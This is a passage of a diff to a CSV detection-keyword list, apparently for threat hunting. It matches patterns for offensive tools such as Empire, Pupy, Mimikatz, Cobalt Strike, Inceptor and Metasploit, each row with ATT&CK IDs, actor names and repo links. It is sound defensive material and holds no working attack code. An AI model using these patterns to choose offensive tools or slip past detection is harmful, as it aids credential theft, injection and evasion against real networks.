TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*import/nexpose*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*import_msf_web*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*ImportDll::GetAsyncKeyState*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllImports -PEInfo *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*Import-DllImports*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Import-DllInRemoteProcess*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*import wapiti*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*import wfuzz*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*import/nessus/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*import/nexpose*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*import_msf_web*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ImportDll::GetAsyncKeyState*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllImports -PEInfo *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*Import-DllImports*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Import-DllInRemoteProcess*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "*Import-Module *Microsoft.ActiveDirectory.Management.dll*","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","1","91","6","2023-10-01T14:24:00Z","2022-12-05T12:40:02Z" "*Inactive Domain Admins Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" -"*inceptor*POWERSHELL*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*inceptor.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*inceptor/obfuscators*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*inceptor-main.zip*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1356","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" -"*include beacon.h*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*include injection.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*inceptor*POWERSHELL*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor.py *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor/obfuscators*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*inceptor-main.zip*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*include beacon.h*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - 